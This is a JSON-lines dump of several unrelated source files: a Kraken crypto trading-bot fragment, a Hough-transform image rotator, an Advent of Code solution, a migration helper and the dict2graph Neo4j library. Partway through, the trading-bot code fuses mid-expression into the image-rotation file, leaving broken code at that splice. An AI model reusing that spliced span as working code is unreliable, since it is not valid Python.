error was \"+str(e))\n break;\n\n # Finally setup open order to freshest list\n list_open_orders=fresh_open_orders\n time.sleep(15)\n\n \n if(DO_STEP2==True):\n \n # Safety check (only if owned_value > 0 (if =-1 it means that it change during time when we get open orders))\n if(owned_volume>0.0):\n safetyCheckOnTradingCurrencySellingOrder(list_open_orders,owned_volume)\n else:\n logger.info(\"Safety check is not going to be performed ( owned_volume=\"+str(owned_volume)+\")\")\n \n ##########################\n # Traders\n ##########################\n CAN_LAUNCH_BUYING_ORDER=False\n CURRENT_BUYING_ORDER_ID=-1\n # Check if a trader is buying, else set up to buy\n EXISTS_OPEN_BUYING_ORDERS=False\n BUYING_TRADER_ID=-1\n for index in range(0,NB_OF_TRADERS):\n if list_trader[index][4]==BUYING:\n EXISTS_OPEN_BUYING_ORDERS=True\n BUYING_TRADER_ID=list_trader[index][0]\n CURRENT_BUYING_ORDER_ID=list_trader[index][3]\n \n # Get trading informations only if no other speculators are buying\n IS_TREND_GROWING=False\n if(EXISTS_OPEN_BUYING_ORDERS==False):\n df2=persistenceHandler.get_Trends_time_series(kraken_time,CURRENCY_CRAWLED_NAME,2)\n df5=persistenceHandler.get_Trends_time_series(kraken_time,CURRENCY_CRAWLED_NAME,5)\n df10=persistenceHandler.get_Trends_time_series(kraken_time,CURRENCY_CRAWLED_NAME,10)\n # I take 16 mins to be sure having at least 14.5 mins\n df15=persistenceHandler.get_Trends_time_series(kraken_time,CURRENCY_CRAWLED_NAME,16)\n \n trends2_is_growing=businessLogic.it_market_increasing(df2)\n trends5_is_growing=businessLogic.it_market_increasing(df5)\n trends10_is_growing=businessLogic.it_market_increasing(df10)\n trends15_is_growing=businessLogic.it_market_increasing(df15)\n \n delay_covered=(max(df15.index) - min(df15.index)).seconds\n logger.info('Covered delay = '+str(round( (delay_covered/60) ,2))+' mins / Trend data: (T2:'+str(len(df2))+' elems),(T5:'+str(len(df5))+' elems),(T10:'+str(len(df10))+' elems),(T15='+str(len(df15))+' elems)')\n \n # Checking if trend is reliable\n if(len(df2)>2 and len(df5)>5 and len(df10)>10 and len(df15)>15 and (delay_covered/60.0)>=14.5):\n if(trends2_is_growing and trends5_is_growing and trends10_is_growing and trends15_is_growing):\n # Checking that trends number is enough:\n logger.info(\"Market is good right now \")\n IS_TREND_GROWING=True\n else:\n logger.info(\"Market is not good at this time \")\n else:\n logger.warn(\"Number of data for trends is not reliable\")\n \n # If market is growing and no one is buying, check bugdet\n if(IS_TREND_GROWING==True and EXISTS_OPEN_BUYING_ORDERS==False):\n logger.info(\"Market is OK, and no buying orders open : time to shop a little bit ! 
\")\n # calculate budget, get the right trader and launch buying\n list_trader=budgetCalculation(list_trader,NB_OF_TRADERS,logs=True)\n \n #Check if the speculator has right to buy:\n if AUTHORIZATION_OF_BUYING==True and currency_actual_ask_price>=MIN_BUYING_PRICE:\n logger.info(\"Remember : Speculator is allowed to trade\")\n # /!\\ check from lowest trader to higher trader is essential\n SELECTED_TRADER_ID_FOR_BUYING=-1\n for index in range(NB_OF_TRADERS-1,-1,-1):\n # If trader's buy price is higher than value price we have the right trader\n if(list_trader[index][2]>=currency_actual_ask_price):\n # index of selected trader is index+1 (lower )\n ###################\n # SET BUYING ORDER\n ##################\n SELECTED_TRADER_ID_FOR_BUYING=index+1\n # Checking it trader is available:\n if(list_trader[SELECTED_TRADER_ID_FOR_BUYING][4]==WAITING):\n # Calculate volume to buy\n volume_to_buy=businessLogic.get_maximum_volume_to_buy_with_budget( round( list_trader[SELECTED_TRADER_ID_FOR_BUYING][5],2),list_trader[SELECTED_TRADER_ID_FOR_BUYING][2] )\n logger.info(\"Trader \"+str(SELECTED_TRADER_ID_FOR_BUYING)+' was selected to buy at '+str(list_trader[SELECTED_TRADER_ID_FOR_BUYING][2])+\" because market price is \"+str(currency_actual_ask_price))\n logger.info(\" budget is going to be \"+str(list_trader[SELECTED_TRADER_ID_FOR_BUYING][5])+\"€\")\n logger.info(\" buying volume :\"+str(volume_to_buy))\n logger.info(\" For further analysis, unix time is \"+str(kraken_time))\n \n # create buying order\n created_buying_order=kraken.secure_buy(volume_to_buy,list_trader[SELECTED_TRADER_ID_FOR_BUYING][2],CURRENCY_CRAWLED_NAME,persistenceHandler,STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,CURRENCY_ORDER_NAME)\n logger.info(\"Buying order \"+created_buying_order.get('order_id')+\" was created\")\n list_open_orders.append(created_buying_order)\n # /!\\set up right status and cut budget setup selling order \n list_trader[SELECTED_TRADER_ID_FOR_BUYING][3]=created_buying_order.get('order_id')\n list_trader[SELECTED_TRADER_ID_FOR_BUYING][4]=BUYING\n list_trader[SELECTED_TRADER_ID_FOR_BUYING][5]=0.0\n # setup buying mode to avoir other buy attempt\n EXISTS_OPEN_BUYING_ORDERS=True\n else:\n logger.info(\"Speculator wanted with trader \"+str(SELECTED_TRADER_ID_FOR_BUYING)+\" is already in \"+str(list_trader[SELECTED_TRADER_ID_FOR_BUYING][4])+\" mode\")\n break;\n else:\n logger.info(\"Speculator is actually in mode AUTHORIZATION_OF_BUYING==False\")\n else:\n if(EXISTS_OPEN_BUYING_ORDERS==True):\n # On ne verifie pas l'ordre du top trader (on ne peut rien faire de toute manière)\n if(BUYING_TRADER_ID>0):\n logger.info(\"Check if Trader \"+str(BUYING_TRADER_ID)+\" buying order has still potential to reach \")\n # check if order is ok\n buying_trader=list_trader[BUYING_TRADER_ID]\n upper_buying_trader=list_trader[BUYING_TRADER_ID-1]\n if(buying_trader[0]==BUYING_TRADER_ID and upper_buying_trader[0]==BUYING_TRADER_ID-1):\n # Control is : market price has to be - upper or equals to buyer unit price\n if(buying_trader[2]<= currency_actual_ask_price and currency_actual_ask_price max_variance:\n max_variance = variance\n target_shift = shift\n\n if shift % 300 == 0 and shift != -MAX_SHIFT:\n plt.clf()\n plt.plot(np.arange(-MAX_SHIFT, shift + 1), variances)\n plt.savefig('out/variances.png')\n\n print(f\"Finished calculating, optimal shift is {target_shift}\")\n sys.setrecursionlimit(old_recursion_limit)\n\n return img_tools.rotate_by_shift(\n self.source, target_shift, \n img_tools.InterpolationType.BILINEAR\n )\n\n def 
_get_brightness_variance(self, shift):\n line_brightness = []\n N, M = self._img.shape \n for x in range(min(-shift, 0), max(N - shift, N) + 1):\n stats = self._brightness_statistics(x, 0, shift, M)\n if stats[1] != 0:\n line_brightness.append(stats[0] / stats[1])\n return np.var(line_brightness) if line_brightness else 0\n\n @lru_cache(10**8)\n def _brightness_statistics(self, x, y, shift_x, shift_y):\n \"\"\"\n returns (brightness sum, amount of featured cells)\n of cells from to not inclusive\n \"\"\"\n\n sign = lambda x: 1 if x >= 0 else -1\n if not img_tools.contains_coordinates(self._img, x, y) and \\\n not img_tools.contains_coordinates(self._img, x + shift_x - sign(shift_x), y + shift_y - 1):\n return np.array([0, 0]) \n \n if abs(shift_x) <= 1:\n res = np.zeros(2)\n for y_i in range(y, y + shift_y):\n if img_tools.contains_coordinates(self._img, x, y_i):\n res += np.array([self._img[x][y_i], 1])\n return res\n\n shift_x2 = sign(shift_x) * (abs(shift_x) // 2)\n shift_y2 = shift_y // 2\n return self._brightness_statistics(x, y, shift_x2, shift_y2) +\\\n self._brightness_statistics(x + shift_x2, y + shift_y2, shift_x - shift_x2, shift_y - shift_y2)","repo_name":"Moysenko/ABBYY_CV","sub_path":"Homework_3/fht.py","file_name":"fht.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
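The memoized halving recursion in _brightness_statistics is the same pattern as computing an interval aggregate by splitting the interval in two; a tiny standalone illustration of the technique (not the image code itself):

from functools import lru_cache

data = [3, 1, 4, 1, 5, 9, 2, 6]

@lru_cache(maxsize=None)
def interval_sum(start, length):
    # sum of data[start:start + length] by recursive halving, memoized
    if length == 1:
        return data[start]
    half = length // 2
    return interval_sum(start, half) + interval_sum(start + half, length - half)

assert interval_sum(0, len(data)) == sum(data)  # 31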
+{"seq_id":"74927007452","text":"def score_round(text: str) -> int:\n legend = {\n \"A\": \"Rock\",\n \"B\": \"Paper\",\n \"C\": \"Scissors\",\n \"X\": \"Rock\",\n \"Y\": \"Paper\",\n \"Z\": \"Scissors\",\n }\n wins = {\"Rock\": \"Scissors\", \"Paper\": \"Rock\", \"Scissors\": \"Paper\"}\n choices = {\"Rock\": 1, \"Paper\": 2, \"Scissors\": 3}\n opp, me = text.split(\" \")\n conv_opp, conv_me = legend[opp], legend[me]\n score = choices[conv_me]\n if wins[conv_opp] == conv_me:\n pass\n elif conv_opp == conv_me:\n score += 3\n elif wins[conv_me] == conv_opp:\n score += 6\n return score\n\n\ndef score_game(text: str) -> int:\n score = 0\n for cur_round in text.split(\"\\n\"):\n score += score_round(cur_round)\n return score\n\n\ndef part_1():\n # tests\n with open(\"2_test.txt\", \"r\") as f:\n data = f.read()\n assert score_game(data) == 15\n\n # input\n with open(\"2_input.txt\", \"r\") as f:\n data = f.read()\n print(score_game(data))\n\n\ndef score_round_part2(text: str) -> int:\n legend = {\"A\": \"Rock\", \"B\": \"Paper\", \"C\": \"Scissors\"}\n wins = {\"Rock\": \"Scissors\", \"Paper\": \"Rock\", \"Scissors\": \"Paper\"}\n losses = {v: k for k, v in wins.items()}\n choices = {\"Rock\": 1, \"Paper\": 2, \"Scissors\": 3}\n opp, me = text.split(\" \")\n conv_opp = legend[opp]\n score = 0\n if me == \"X\":\n score += choices[wins[conv_opp]]\n elif me == \"Y\":\n score += choices[conv_opp] + 3\n elif me == \"Z\":\n score += choices[losses[conv_opp]] + 6\n return score\n\n\ndef score_second_game(text: str) -> int:\n score = 0\n for cur_round in text.split(\"\\n\"):\n score += score_round_part2(cur_round)\n return score\n\n\ndef part_2():\n # tests\n with open(\"2_test.txt\", \"r\") as f:\n data = f.read()\n assert score_second_game(data) == 12\n\n # input\n with open(\"2_input.txt\", \"r\") as f:\n data = f.read()\n print(score_second_game(data))\n\n\npart_1()\npart_2()\n","repo_name":"grahampicard/advent-of-code-2022","sub_path":"2/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"41812236353","text":"import importlib\n\n\nclass Migrator:\n\tVERSION = None\n\n\tdef __init__(self, db):\n\t\t\"\"\"\n\t\tInitiate migrator class.\n\n\t\t:param db: Database instance\n\t\t:type db: layblr.database.db.Database\n\t\t\"\"\"\n\t\tself.db = db\n\t\tself.connection = db.connection\n\n\tasync def up(self):\n\t\t\"\"\"\n\t\tMigrate the schema to the new version.\n\t\t\"\"\"\n\t\traise NotImplementedError\n\n\tasync def down(self):\n\t\t\"\"\"\n\t\tMigrate down to the older version (undo changes). Optional but recommended.\n\t\t:return:\n\t\t\"\"\"\n\t\traise Exception('No down migration')\n\n\ndef get_migration_versions():\n\t\"\"\"\n\tScan folder for migration versions and return the version classes.\n\n\t:return: Version migrator classses.\n\t\"\"\"\n\tfrom layblr.database.migration import versions\n\treturn versions\n\n\ndef get_latest_version():\n\t\"\"\"\n\tGet latest version.\n\n\t:return: Latest version number\n\t\"\"\"\n\tversions = get_migration_versions()\n\treturn int(versions[len(versions) - 1])\n\n\ndef get_version_class(version):\n\t\"\"\"\n\tImport and return class of the given integer version.\n\t:param version: Version integer.\n\t:return: Class of the migration version.\n\t\"\"\"\n\tversion_string = '{0:03d}'.format(version)\n\tmodule_name = 'v{}'.format(version_string)\n\tversion_class = 'Version{}'.format(version_string)\n\n\tmodule = importlib.import_module('layblr.database.migration.{}'.format(module_name))\n\treturn getattr(module, version_class)\n","repo_name":"layblr/layblr","sub_path":"layblr/database/migrator.py","file_name":"migrator.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"41597447839","text":"import json\nfrom typing import Union\nfrom typing import List, Dict, Tuple, Type\nfrom py2neo import Graph\nfrom neo4j import Driver\n\nfrom graphio import NodeSet, RelationshipSet\nfrom dict2graph.node import Node\nfrom dict2graph.relation import Relation\nfrom dict2graph.transformers._base import (\n _NodeTransformerBase,\n _RelationTransformerBase,\n)\nfrom dict2graph.transformers import Transformer\nfrom dict2graph.matcher_transformators_container import (\n MatcherTransformersContainer,\n MatcherTransformersContainerStack,\n)\n\n\nclass Dict2graph:\n \"\"\"\n The central class for dict2graph. Must be instanced to do get started and access the dict2graph api.\n\n **Class attributes**\n Dict2Graph has some basic options, packed into class attributes. You can change them after instantiating Dict2Graph.\n Usally you can go with the default values and dont need to change anything here.\n\n **example**\n\n ```python\n from dict2graph import Dict2graph\n\n d2g = Dict2graph()\n d2g.list_hub_additional_labels = [\"Collection\"]\n ```\n This will (later when parsing/transforming) add a label `Collection` to all list hubs\n\n\n Attributes:\n list_hub_additional_labels: Add these labels to list hub nodes. Defaults to `[\"ListHub\"]`.\n\n list_item_additional_labels: Add these labels to list item nodes. Defaults to `[\"ListItem\"]`.\n\n list_hub_id_property_name: A hub node has hash generated property based on its items.\n This is the name/key of the property. Defaults to `id`.\n\n list_item_relation_index_property_name: To preserve a json/dict list sequence,\n the index will be added to the relation from a list item node.\n This is the name/key of this property. Defaults to `_list_item_index`.\n\n simple_list_item_data_property_name: A list of basic types like `[1,2,3]` will get the label from its parents,\n but needs a default name/key for the value properties. Defaults to `_list_item_data`.\n\n root_node_default_labels: Will be used as root node label, if no root node label can be captured\n and no articial root node labels (via `Dict2Graph.parse(root_node_labels)`) are provided. Defaults to `[\"Dict2GraphRoot\"]`.\n\n root_node_default_id_property_name: The root node will have a primary key based on a hash of the dict input. This is the name/key fir this property.\n\n empty_node_default_id_property_name: To prevent all empty nodes to merging together when doing\n `Dict2Graph.merge()`, they get an hash id by default.\n This is name/key for this property. Defaults to `id`.\n \"\"\"\n\n # Replacement strings {ITEM_PRIMARY_LABEL} and {ITEM_LABELs} are available\n list_hub_additional_labels: List[str] = [\"ListHub\"]\n list_item_additional_labels: List[str] = [\"ListItem\"]\n list_hub_id_property_name: str = \"id\"\n list_item_relation_index_property_name: str = \"_list_item_index\"\n\n simple_list_item_data_property_name: str = \"_list_item_data\"\n root_node_default_labels: List[str] = [\"Dict2GraphRoot\"]\n root_node_default_id_property_name: str = \"id\"\n\n empty_node_default_id_property_name: str = \"id\"\n\n def __init__(\n self,\n create_ids_for_empty_nodes: bool = True,\n interpret_single_props_as_labels: bool = True,\n ):\n \"\"\"\n Usage:\n ```python\n from dict2graph import Dict2graph\n\n d2g = Dict2Graph()\n ```\n\n Args:\n create_ids_for_empty_nodes (bool, optional): When input dicts results in empty 'hub' nodes, this will create artificially key properties based on the child data. The key will be deterministic . 
Defaults to True.\n interpret_single_props_as_labels (bool, optional): When having objects with a single property like `{\"animal\":{\"name\":\"dog\"}}` `animal` will be interpreted as label. If set to false \"animal\" will result in an extra Node. Defaults to True.\n \"\"\"\n self.create_ids_for_empty_nodes = create_ids_for_empty_nodes\n\n # Todo: \"interpret_single_props_as_labels\" should be a regualr NodeTransformer instead of a class param\n self.interpret_single_props_as_labels = interpret_single_props_as_labels\n\n self._node_cache: List[Node] = []\n self._node_cache_feeder: List[Node] = []\n\n self._rel_cache: List[Relation] = []\n self._rel_cache_feeder: List[Node] = []\n self._nodeSets: Dict[Tuple, NodeSet] = {}\n self._relSets: Dict[Tuple, RelationshipSet] = {}\n self.matcher_and_node_transformers_stack = MatcherTransformersContainerStack([])\n self.matcher_and_rel_transformers_stack = MatcherTransformersContainerStack([])\n\n def add_transformation(\n self,\n transformer: Union[\n _NodeTransformerBase,\n _RelationTransformerBase,\n List[Union[_NodeTransformerBase, _RelationTransformerBase]],\n ],\n ):\n \"\"\"Add one or a list of [`Transformers`](/use_transformers.md) to the Dict2Graph instance.\n Transformers can re-model your graph befor writing it to a Neo4j database.\n\n **usage**:\n ```python\n from dict2graph import Dict2graph, Transformer, NodeTrans\n\n d2g = Dict2Graph()\n d2g.add_transformation(\n Transformer.match_nodes(\"article\").do(NodeTrans.OverrideLabel(\"book\"))\n )\n ```\n\n Args:\n transformer (Union[ _NodeTransformerBase, _RelationTransformerBase, List[Union[_NodeTransformerBase, _RelationTransformerBase]], ]): A list or single instance of a Transformer\n\n \"\"\"\n\n if isinstance(transformer, list):\n for trans in transformer:\n self.add_transformation(trans)\n return\n if self._get_transformer_class(transformer) == _NodeTransformerBase:\n self.add_node_transformation(transformer)\n\n elif self._get_transformer_class(transformer) == _RelationTransformerBase:\n self.add_relation_transformation(transformer)\n else:\n raise ValueError(\n f\"Expected transformer of subclass '{_NodeTransformerBase}' or '{_RelationTransformerBase}', got '{transformer.__class__}' (child of '{transformer.__class__.__bases__}')\"\n )\n\n def _get_transformer_class(\n self, transformer: Union[_NodeTransformerBase, _RelationTransformerBase]\n ) -> Union[Type[_NodeTransformerBase], type[_RelationTransformerBase]]:\n if issubclass(transformer.__class__, _NodeTransformerBase) and issubclass(\n transformer.__class__, _RelationTransformerBase\n ):\n # We got a generic transformer. 
we have to look at the matcher to determine the transformer type.\n if isinstance(transformer.matcher, Transformer.RelTransformerMatcher):\n return _RelationTransformerBase\n elif isinstance(transformer.matcher, Transformer.NodeTransformerMatcher):\n return _NodeTransformerBase\n elif issubclass(transformer.__class__, _NodeTransformerBase):\n return _NodeTransformerBase\n elif issubclass(transformer.__class__, _RelationTransformerBase):\n return _RelationTransformerBase\n\n def add_node_transformation(\n self, transformer: Union[_NodeTransformerBase, List[_NodeTransformerBase]]\n ):\n if isinstance(transformer, list):\n for trans in transformer:\n self.add_node_transformation(trans)\n return\n if transformer.matcher is None:\n raise ValueError(f\"No matcher added to {transformer}\")\n if not issubclass(transformer.__class__, _NodeTransformerBase):\n raise ValueError(\n f\"Expected transformer of subclass '{_NodeTransformerBase}', got '{transformer.__class__}' (child of '{transformer.__class__.__bases__}').\\nMaybe you wanted to use function `Dict2graph.add_relation_transformation()` instead of `add_node_transformation`?\"\n )\n elif transformer.matcher.__class__ != Transformer.NodeTransformerMatcher:\n raise ValueError(\n f\"Expected transformer matcher of class '{Transformer.NodeTransformerMatcher}', got '{transformer.matcher.__class__}'.\\nMaybe you accidentally added a relationship matcher instead of a node matcher (`match_nodes()` vs. `match_rels()`) while using `Dict2graph.add_node_transformation()`?\"\n )\n else:\n transformer.d2g = self\n self.matcher_and_node_transformers_stack.add_container(transformer)\n\n def add_relation_transformation(\n self,\n transformer: Union[_RelationTransformerBase, List[_RelationTransformerBase]],\n ):\n if isinstance(transformer, list):\n for trans in transformer:\n self.add_relation_transformation(trans)\n return\n elif not issubclass(transformer.__class__, _RelationTransformerBase):\n raise ValueError(\n f\"Expected transformer of subclass '{_RelationTransformerBase}', got '{transformer.__class__}' (child of '{transformer.__class__.__bases__}').\\nMaybe you wanted to use function `Dict2graph.add_node_transformation()` instead of `add_relation_transformation`?\"\n )\n elif transformer.matcher.__class__ != Transformer.RelTransformerMatcher:\n raise ValueError(\n f\"Expected transformer matcher of class '{Transformer.RelTransformerMatcher}', got '{transformer.matcher.__class__}'.\\nMaybe you accidentally added a node matcher instead of a relationship matcher (`match_rels()` vs. `match_nodes()`) while using `Dict2graph.add_relation_transformation()`?\"\n )\n else:\n self.matcher_and_rel_transformers_stack.add_container(transformer)\n\n def parse(\n self, data: Dict, root_node_labels: Union[str, List[str]] = None\n ) -> \"Dict2graph\":\n \"\"\"Submit your actual data (as dict) to dict2graph. The data will be transformed instantly but not yet pushed to your Neo4j database.\n It will land in a dict2graph internal cache. 
You can run multiple `Dict2Graph.parse()` passes before pushing the data to your Neo4j database.\n\n **usage**\n ```python\n from dict2graph import Dict2graph\n # provide any dict that is json compatible (basic typed values and keys)\n data = {\"myDictKey\":\"myValue\"}\n d2g = Dict2Graph()\n d2g.parse(data)\n ```\n Args:\n data (Dict): Your data as a dict with only basic typed valued, as a rule of thumb it should be json compatible.\n If you have json string you may use the build-in python module \"json\" in before(`json.loads(your_data_as_json)`)\n root_node_labels (Union[str, List[str]], optional): Dict2graph tries to determine a sensible root node.\n But that is not possible in many cases and dict2graph\n will return to the default label in `Dict2graph.root_node_default_labels`.\n with `Dict2graph.parse(root_node_labels)` you can force a root label.\n Defaults to None.\n\n Raises:\n ValueError: When data is not parsable.\n\n Returns:\n Dict2graph: Returns itself to be able to chains commands like `dict2graph_ints.parse(data).parse(data2).create(NEO4J_DRIVER)`\n \"\"\"\n if root_node_labels is None:\n if isinstance(data, dict) and len(data.keys()) == 1:\n # we only have one key and therefore only one Node on the top-/root-level. We dont need a root Node to connect the toplevels nodes.\n root_node_labels = [list(data.keys())[0]]\n data = data[root_node_labels[0]]\n else:\n root_node_labels = self.root_node_default_labels\n if isinstance(root_node_labels, str):\n root_node_labels = [root_node_labels]\n\n if isinstance(data, str):\n data_obj = json.loads(data)\n else:\n data_obj = data\n if not isinstance(data_obj, dict) and not isinstance(data_obj, list):\n raise ValueError(\n \"Expected json compatible object like a dict or list. got {}\".format(\n type(data_obj).__name__\n )\n )\n if isinstance(data_obj, dict):\n\n root_node = self._parse_traverse_dict_fragment(\n labels=root_node_labels, data=data_obj, parent_node=None\n )\n\n elif isinstance(data_obj, list):\n root_node = self._parse_traverse_list_fragment(\n labels=root_node_labels, data=data_obj, parent_node=None\n )\n self._prepare_root_node(root_node)\n\n self._flush_cache()\n return self\n\n def merge(\n self,\n graph: Union[Graph, Driver],\n database: str = None,\n create_merge_indexes: bool = True,\n ):\n \"\"\"Push the data to a Neo4h database, with a merge operation.\n\n **usage**\n ```python\n from dict2graph import Dict2graph\n from neo4j import GraphDatabase\n # provide any dict that is json compatible (basic typed values and keys)\n data = {\"car\":{\"wheels\":\"4\"}}\n data2 = {\"car\":{\"wheels\":\"4\"}}\n d2g = Dict2Graph()\n d2g.parse(data)\n d2g.parse(dat2)\n d2g.merge(GraphDatabase.driver(\"neo4j://localhost\"))\n ```\n\n Will result in one node `(:car{wheels:4})` because the two datasets where merged (based on same labels and properties).\n\n Args:\n graph (Union[Graph, Driver]): A [`neo4j.GraphDatabase` instance](https://neo4j.com/docs/api/python-driver/current/)\n or a [`py2neo.Graph` instance](https://py2neo.org/2021.1/workflow.html#graph-objects)\n database (str, optional): Name of the Neo4j [database](https://neo4j.com/docs/cypher-manual/current/databases/). Defaults to None which will eb the default \"neo4j\" db.\n create_merge_indexes (bool, optional): _description_. 
Defaults to True.\n \"\"\"\n\n if create_merge_indexes:\n self.create_indexes_for_merge_keys(graph)\n for nodes in self._nodeSets.values():\n nodes.merge(graph, database=database)\n for rels in self._relSets.values():\n rels.merge(graph, database=database)\n\n def create(\n self,\n graph: Union[Graph, Driver],\n database: str = None,\n ):\n \"\"\"Push the data to a Neo4h database, with a create operation.\n\n **usage**\n ```python\n from dict2graph import Dict2graph\n from neo4j import GraphDatabase\n # provide any dict that is json compatible (basic typed values and keys)\n data = {\"car\":{\"wheels\":\"4\"}}\n data2 = {\"car\":{\"wheels\":\"4\"}}\n d2g = Dict2Graph()\n d2g.parse(data)\n d2g.parse(dat2)\n d2g.create(GraphDatabase.driver(\"neo4j://localhost\"))\n ```\n\n Will result in two nodes `(:car{wheels:4})`.\n\n Args:\n graph (Union[Graph, Driver]): A [Neo4j python driver instance](https://neo4j.com/docs/api/python-driver/current/)\n or a [`py2neo.Graph` instance](https://py2neo.org/2021.1/workflow.html#graph-objects)\n database (str, optional): Name of the Neo4j [database](https://neo4j.com/docs/cypher-manual/current/databases/). Defaults to None which will eb the default \"neo4j\" db.\n \"\"\"\n for nodes in self._nodeSets.values():\n nodes.create(graph, database=database)\n for rels in self._relSets.values():\n rels.create(graph, database=database)\n\n def create_indexes_for_merge_keys(self, graph: Union[Graph, Driver]):\n for nodes in self._nodeSets.values():\n\n nodes.create_index(graph)\n\n def _prepare_root_node(self, node: Node):\n node.is_root_node = True\n if len(node.keys()) == 0:\n node[self.root_node_default_id_property_name] = node.get_hash(\n include_children_data=True\n )\n\n node.merge_property_keys = [self.root_node_default_id_property_name]\n\n def _parse_traverse_dict_fragment(\n self, data: Dict, parent_node: Node, labels: List[str] = None\n ) -> Node:\n new_node = Node(labels=labels, source_data=data, parent_node=parent_node)\n new_child_nodes: List[Node] = []\n new_rels: List[Relation] = []\n for key, val in data.items():\n if self._is_basic_attribute_type(val):\n # value is a simple type. attach as property to node\n new_node[key] = val\n else:\n # value is dict or list in itself and therefore one or multiple child nodes\n r = None\n n = None\n if isinstance(val, dict):\n if self._is_named_obj(val):\n n = self._parse_traverse_dict_fragment(\n labels=list(val.keys()),\n data=val[list(val.keys())[0]],\n parent_node=new_node,\n )\n r = Relation(start_node=new_node, end_node=n, relation_type=key)\n else:\n n = self._parse_traverse_dict_fragment(\n labels=[key], data=val, parent_node=new_node\n )\n elif isinstance(val, list):\n n = self._parse_traverse_list_fragment(\n labels=[key], data=val, parent_node=new_node\n )\n elif val is not None:\n raise ValueError(\n f\"Expected dict val to be a None, basic type, a list or a dict. Got `{type(val)}` for key '{key}' value '{val}'\"\n )\n if n is not None:\n new_child_nodes.append(n)\n if r is None:\n r = Relation(\n start_node=new_node,\n end_node=n,\n )\n new_rels.append(r)\n self._node_cache.append(new_node)\n self._rel_cache.extend(new_rels)\n return new_node\n\n def _parse_traverse_list_fragment(\n self, labels: List[str], parent_node: Node, data: Dict\n ) -> Node:\n\n # create/set list root node. 
this is the node to which the list items will attach\n # the parent_node is the default root\n\n list_root_hub_node: Node = Node(\n labels=labels,\n source_data=data,\n parent_node=parent_node,\n )\n self._set_list_root_hub_node_labels(list_root_hub_node)\n list_root_hub_node.is_list_list_hub = True\n self._node_cache.append(list_root_hub_node)\n # parse nodes\n new_list_item_nodes: List[Node] = []\n for index, obj in enumerate(data):\n if self._is_basic_attribute_type(obj):\n n = Node(labels, source_data=obj, parent_node=list_root_hub_node)\n\n n[self.simple_list_item_data_property_name] = obj\n self._node_cache.append(n)\n new_list_item_nodes.append(n)\n elif self._is_named_obj(obj):\n obj_label = list(obj.keys())[0]\n obj_data = obj[obj_label]\n new_list_item_nodes.append(\n self._parse_traverse_dict_fragment(\n labels=obj_label, data=obj_data, parent_node=list_root_hub_node\n )\n )\n elif isinstance(obj, dict):\n new_list_item_nodes.append(\n self._parse_traverse_dict_fragment(\n labels=labels, data=obj, parent_node=list_root_hub_node\n )\n )\n elif isinstance(obj, list):\n new_list_item_nodes.append(\n self._parse_traverse_list_fragment(\n labels=labels, data=obj, parent_node=list_root_hub_node\n )\n )\n\n # create relations to list root node\n child_ids: List[str] = []\n\n for index, node in enumerate(new_list_item_nodes):\n if node is None:\n continue\n self._set_list_item_node_labels(node)\n node.is_list_list_item = True\n child_ids.append(node.id)\n r = Relation(\n start_node=list_root_hub_node,\n end_node=node,\n )\n\n r[self.list_item_relation_index_property_name] = index\n node.parent_node = list_root_hub_node\n self._rel_cache.append(r)\n #\n\n list_root_hub_node[\n self.list_hub_id_property_name\n ] = list_root_hub_node.get_hash(include_children_data=True)\n list_root_hub_node.merge_property_keys = [self.list_hub_id_property_name]\n\n return list_root_hub_node\n\n def _is_empty(self, val):\n if not val:\n return True\n if isinstance(val, str) and val.upper() in [\"\", \"NULL\"]:\n return True\n return False\n\n def _is_basic_attribute_type(self, val):\n if isinstance(val, (str, int, float, bool)):\n return True\n else:\n return False\n\n def _is_named_obj(self, data: Dict):\n \"\"\"If an object is a one-keyed dict on the first layer and there is a dict behind this key,\n we treat that one key as the label/type and the inner dict as the props\n\n Args:\n data (Dict): The dict fragment to inspect.\n\n Returns:\n bool: True if the dict qualifies as a named object.\n \"\"\"\n # {\"person\":{\"name\":\"tom\",\"lastname\":\"schilling\"}} -> we know it's a person\n # {\"name\":\"tom\",\"lastname\":\"schilling\"} -> Could be a person or a lama\n # {\"client\":{\"name\":\"tom\",\"lastname\":\"schilling\"},\"cert\":\"yes\"} -> Could be a person or a computer\n if not self.interpret_single_props_as_labels:\n return False\n if (\n isinstance(data, dict)\n and len(data.keys()) == 1\n and isinstance(data[list(data.keys())[0]], dict)\n ):\n return True\n return False\n\n def _set_list_root_hub_node_labels(self, node: Node) -> None:\n addi_labels = [\n l.replace(\"{{ITEM_PRIMARY_LABEL}}\", node.primary_label)\n for l in self.list_hub_additional_labels\n ]\n addi_labels = [\n # join all labels; joining the primary label string itself would separate its characters\n l.replace(\"{{ITEM_LABELS}}\", \"_\".join(node.labels))\n for l in addi_labels\n ]\n\n node.labels = node.labels + addi_labels\n\n def _set_list_item_node_labels(self, node: Node) -> None:\n node.labels = node.labels + self.list_item_additional_labels\n\n def _manifest_node_from_cache(self, cached_node: Node):\n node_set: NodeSet = 
self._get_or_create_nodeSet(cached_node)\n if self.create_ids_for_empty_nodes and cached_node.id is None:\n cached_node[\n self.empty_node_default_id_property_name\n ] = cached_node.get_hash(include_children_data=True)\n cached_node.merge_property_keys = [self.empty_node_default_id_property_name]\n node_set.add_node(cached_node)\n\n def _get_or_create_nodeSet(self, node: Node) -> NodeSet:\n node_type_fingerprint = (\n frozenset(node.labels),\n frozenset(node.merge_property_keys),\n )\n if node_type_fingerprint not in self._nodeSets:\n self._nodeSets[node_type_fingerprint] = NodeSet(\n labels=node.labels,\n merge_keys=node.merge_property_keys\n if node.merge_property_keys\n else list(node.keys()),\n )\n return self._nodeSets[node_type_fingerprint]\n\n def _manifest_rel_from_cache(self, cached_relation: Relation):\n rel_set: RelationshipSet = self._get_or_create_relSet(cached_relation)\n rel_set.add_relationship(\n start_node_properties=cached_relation.start_node,\n end_node_properties=cached_relation.end_node,\n properties=cached_relation,\n )\n\n def _get_or_create_relSet(self, relation: Relation) -> RelationshipSet:\n rel_id = (\n frozenset(relation.start_node.labels),\n frozenset(relation.start_node.merge_property_keys),\n relation.relation_type,\n frozenset(relation.end_node.labels),\n 